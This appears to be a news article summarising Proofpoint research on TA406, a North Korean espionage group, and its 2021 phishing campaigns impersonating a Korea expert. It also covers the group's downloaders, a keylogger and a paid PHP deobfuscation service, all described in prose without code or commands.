A North Korean cyber espionage group known primarily for targeting think tanks, advocacy groups, journalists and others related to Pyongyang’s adversaries around the world has been quite prolific in 2021, according to email security firm Proofpoint.
The stepped-up action includes launching near-weekly attacks, among them two previously unreported campaigns.
In findings published Thursday, the firm examined the activities of a group it refers to as TA406, which it considers to be one of the components of an organization known more broadly as Kimsuky that’s been active since at least 2012. The U.S. government issued a public alert to the private sector in October 2020 about Kimsuky, warning of spearphishing, watering hole attacks and other methods designed to steal credentials.
TA406 targets research, education, government, media and other organizations for credential theft, Proofpoint analysts Darien Huss and Selena Larson wrote. The group’s other activities involve financial crimes and sextortion, and an increased use of malware. The campaigns remained “low in volume” until the beginning of January 2021, but starting then and through June 2021, the group launched “almost weekly campaigns,” the researchers wrote.
The first previously unreported campaign, in March 2021, used an email purportedly sent by Chad O’Carroll, an expert on North Korea and the CEO of Korea Risk, an analysis firm focused on North Korean issues. The email contained a link that sent the target to a domain controlled by the group, which hosted a legitimate news article about the March 21 North Korean missile tests.
The link also downloaded a file that would create a scheduled task that executed every 15 minutes to download a payload from a TA406-controlled server. Proofpoint analysts did not see what the follow-on payloads were, so it’s unclear what happened next.
Relying on a legitimate news article hosted on an attacker-controlled domain or embedded in a document is a previous tactic the hackers used to deploy KONNI, a remote administration tool, the day after a North Korean missile test in 2017, the Proofpoint researchers note. KONNI has been used to target North Korea in the past, as well as Russia, Malwarebytes reported in August.
The second campaign, in June 2021, also purported to come from O’Carroll. That email contained an HTML attachment masquerading as an article preview. If clicked, the attachment displayed a fake error message with a button to save the document.
If the target downloaded the document, they got served a malicious Word file that sought to deploy a downloader Proofpoint calls “FatBoy” that ultimately lead to a script that could collect “extensive information” about the targeted device. The email also contained an invisible iframe that collected basic information about the target.
The report also highlighted a TA406 Windows keylogger that Proofpoint called “YoreKey,” and a deobfuscation service North Korea may have been using for financial gain. The service — “Deioncube” — was developed some time in 2020 and offered the ability to “decode the files encrypted with IonCube easily.” IonCube is software that encodes PHP scripts. Users could pay $10 to decode one file, or $500 for up to 500 files, payable in either bitcoin or ethereum cryptocurrencies. It’s unclear whether the service actually worked, the researchers wrote.
The researchers noted that the domain advertising the North Korean service was registered with the email address “donaldxxxtrump[@]yandex.ru,” which was also used to register several credential harvesting and malware campaigns in 2021.